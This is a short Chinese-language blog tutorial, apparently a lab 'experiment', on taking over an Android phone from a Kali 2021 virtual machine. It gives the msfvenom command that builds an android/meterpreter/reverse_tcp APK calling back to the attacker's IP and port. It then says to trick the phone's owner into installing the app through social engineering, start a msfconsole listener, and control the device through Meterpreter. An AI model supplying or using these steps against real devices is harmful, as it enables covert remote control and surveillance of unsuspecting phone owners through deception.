实验工具
3、Android手机
1、在VMware中打开Kali 2021虚拟机,确定Android手机的IP后进行【Ping】测试,确认Kali 2021能够直接访问Android手机。
2、确定能连通后,回到Kali 2021虚拟机,打开一个终端,准备进行手机木马病毒文件的制作,首先生成木马文件,需要用到MSF攻击框架,输入命令【msfvenom -p android/meterpreter/reverse_tcp LHOST=Kali的IP地址 LPORT=Kali的端口号 R > 自定义文件名.apk】。
3、创建完成后,可以通过【社会工程学】上传到Android手机中,并欺骗手机拥有者运行该程序。进行提权的前提是我们要有一个监听程序,Kali 2021虚拟机新建终端,进入MSF攻击框架,输入命令【msfconsole】。
4、设置侦听模块,并配置攻击载荷,这里需要注意的是,攻击载荷中的【LHOST】和【LPORT】要求和刚刚生成的木马文件的IP地址和端口号一致,否则攻击失效。
5、攻击载荷设置完毕后,输入【exploit】运行,回到Android手机中运行刚刚安装的.apk文件,发现Kali 2021中的MSF框架跳转到Meterpreter界面,证明提权成功,接下来可以通过Meterpreter命令控制Android手机。
知乎地址:https://www.zhihu.com/people/yi-kuai-xiao-bing-gan-43-64/posts
CSDN地址:https://blog.csdn.net/liu914589417
欢迎关注评论,耶斯莫拉